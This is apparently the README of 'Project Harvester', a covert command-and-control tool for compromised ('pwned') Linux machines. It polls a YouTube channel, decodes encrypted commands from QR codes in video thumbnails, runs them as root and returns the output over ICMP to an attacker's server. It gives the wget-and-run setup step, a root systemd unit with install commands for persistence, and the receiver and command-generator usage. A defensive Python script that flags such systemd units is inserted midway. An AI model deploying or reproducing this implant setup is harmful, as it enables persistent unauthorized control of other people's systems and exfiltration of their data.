Project Harvester is a program created to control Linux systems remotely by uploading videos to YouTube.
The program monitors a YouTube channel until a video is uploaded, decodes the QR code from the thumbnail of the uploaded video, and executes the command it contains. The QR codes in the videos use AES-encrypted values.
- Server that you control, with a public IP address to receive output
- Pwned machine, where you have the ability to create files and execute them as root
- Create a new Google account, or use an existing one if you would like.
- Go to https://console.cloud.google.com/apis/credentials, create a new project, then create credentials (API key).
- Get the ID from your YouTube channel URL, e.g. UCOaqVWZgdddtDMqmdze4Wvw
- On your machine:
  $ wget https://raw.githubusercontent.com/ninjawill543/Project-Harvester/main/setup.py ; python3 setup.py
- Follow the instructions until you get a setup complete message.
Copy all the files in the pwned folder to your victim server. By default, the youtube.service file looks like this:
[Unit]
Description=Youtube download
[Service]
User=root
WorkingDirectory=<directory_of_script e.g. /root>
ExecStart=listen.sh
Restart=always
[Install]
WantedBy=multi-user.target
You must replace <directory_of_script e.g. /root> with the directory where your files will be stored.
Then follow these commands:
$ sudo mv youtube.service /etc/systemd/system/
$ sudo systemctl daemon-reload
$ sudo chown root:root /etc/systemd/system/youtube.service
$ sudo chmod +x listen.sh
$ python3 -m pip install -r requirements.txt
$ sudo systemctl enable youtube.service
$ sudo systemctl start youtube.service
$ sudo systemctl status youtube.service
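From the defender's side, the unit file above has traits a host audit can look for. The following is an added example, not part of Project Harvester: a Python check that parses a systemd unit and flags the combination shown on this page (root service, Restart=always, an ExecStart outside the system binary directories, a WorkingDirectory under a home or temp path). The directory lists and function names are assumptions, and both sample units are constructed.

```python
import configparser

# Assumed policy (not from the page): usual binary dirs, unusual service workdirs.
TRUSTED_EXEC_DIRS = ("/usr/", "/bin/", "/sbin/", "/opt/")
SUSPECT_WORKDIRS = ("/root", "/home/", "/tmp", "/var/tmp", "/dev/shm")

# Constructed sample: the unit shown above with /root filled in.
SAMPLE_PAGE_UNIT = """[Unit]
Description=Youtube download
[Service]
User=root
WorkingDirectory=/root
ExecStart=listen.sh
Restart=always
[Install]
WantedBy=multi-user.target
"""
# Constructed sample: a typical benign daemon unit.
SAMPLE_BENIGN_UNIT = """[Service]
ExecStart=/usr/sbin/sshd -D
Restart=on-failure
"""

def parse_unit(text):
    """Parse unit text into {section: {key: value}}, keeping key case."""
    cp = configparser.ConfigParser(strict=False, interpolation=None, delimiters=("=",))
    cp.optionxform = str
    cp.read_string(text)
    return {s: dict(cp[s]) for s in cp.sections()}

def audit_unit(text):
    """Return the list of traits found in one unit file."""
    svc = parse_unit(text).get("Service", {})
    findings = []
    if svc.get("User", "root") == "root":  # system services default to root
        findings.append("runs-as-root")
    if svc.get("Restart") == "always":
        findings.append("restart-always")
    # Drop systemd's ExecStart prefixes (-, @, :, +, !) before checking the path.
    exe = svc.get("ExecStart", "").lstrip("-@:+!").split(" ")[0]
    if exe and not exe.startswith(TRUSTED_EXEC_DIRS):
        findings.append("exec-outside-system-dirs")
    if svc.get("WorkingDirectory", "").lstrip("-").startswith(SUSPECT_WORKDIRS):
        findings.append("workdir-in-home-or-tmp")
    return findings

def is_suspicious(text):
    """Flag only the combination; each trait alone is common in benign units."""
    f = set(audit_unit(text))
    return {"runs-as-root", "restart-always"} <= f and len(f) > 2
```

Run `is_suspicious` over the contents of each file in /etc/systemd/system and review any hit against the package that owns the unit; an unowned unit with this profile warrants a closer look.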
Copy all the files in the server folder to your server. By default, the last two lines of the receive.py file contain:
sniff(filter="icmp", prn=print_it_please, count=0)
#add iface="interface" to change sniffing interface
To change the interface on which the incoming traffic will be received, change your file to look like this:
sniff(filter="icmp", prn=print_it_please, count=0, iface="yourinterfacename")
$ python3 -m pip install -r requirements.txt
$ python3 -m pip install -r requirements.txt
First, run the qrcode_gen.py file and choose a string with the --string option. This string is the command you would like to be executed on the pwned server.
Next, start your receive.py running on your controlled server, and upload the generated video to your youtube channel.
Now you just have to wait for the command to be executed and the output sent to you.
The idea for this project was originally conceived by Ricardo Ruiz. I have recreated his project entirely from scratch with the aim of understanding how it works and adapting it for Linux systems.
This project has only been tested on Ubuntu 22.04 systems.